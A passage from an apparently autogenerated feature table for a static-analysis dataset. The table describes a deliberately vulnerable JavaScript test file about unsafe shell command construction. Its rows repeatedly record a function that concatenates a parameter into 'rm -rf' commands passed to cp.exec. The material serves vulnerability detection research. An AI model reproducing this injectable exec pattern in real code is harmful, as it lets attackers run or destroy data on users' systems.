name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:32:89:34 | " " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:32:89:34 | " " | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:32:89:34 | " " | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:32:89:34 | " " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:3 | cp | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:3 | cp | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:8 | cp.exec | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | exceptional return of cp.exec ... n(" ")) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | exceptional return of cp.exec ... n(" ")) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | exceptional return of cp.exec ... n(" ")) | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | exceptional return of cp.exec ... n(" ")) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | exceptional return of cp.exec ... n(" ")) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:5:91:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:5:91:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:5:91:8 | exec | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:5:91:8 | exec | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:5:91:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:39 | ["rm -r ... + "\\""] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:39 | ["rm -r ... + "\\""] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:39 | ["rm -r ... + "\\""] | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:39 | ["rm -r ... + "\\""] | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:39 | ["rm -r ... + "\\""] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:44 | ["rm -r ... "].join | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:44 | ["rm -r ... "].join | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:44 | ["rm -r ... "].join | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:44 | ["rm -r ... "].join | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:44 | ["rm -r ... "].join | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | ["rm -r ... in(" ") | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | ["rm -r ... in(" ") | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | ["rm -r ... in(" ") | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | ["rm -r ... in(" ") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | ["rm -r ... in(" ") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | ["rm -r ... in(" ") | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | ["rm -r ... in(" ") | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | ["rm -r ... in(" ") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | ["rm -r ... in(" ") | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | exceptional return of ["rm -r ... in(" ") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | exceptional return of ["rm -r ... in(" ") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | exceptional return of ["rm -r ... in(" ") | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | exceptional return of ["rm -r ... in(" ") | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | exceptional return of ["rm -r ... in(" ") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:11:91:18 | "rm -rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:11:91:18 | "rm -rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:11:91:18 | "rm -rf" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:11:91:18 | "rm -rf" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:11:91:18 | "rm -rf" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:11:91:18 | "rm -rf" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:11:91:18 | "rm -rf" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:11:91:18 | "rm -rf" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:11:91:18 | "rm -rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:11:91:18 | "rm -rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:24 | "\\"" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:24 | "\\"" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:24 | "\\"" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:24 | "\\"" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:24 | "\\"" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:24 | "\\"" | stringConcatenatedWith | -endpoint- name + '"' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:31 | "\\"" + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:31 | "\\"" + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:31 | "\\"" + name | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:31 | "\\"" + name | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:31 | "\\"" + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | contextFunctionInterfaces | 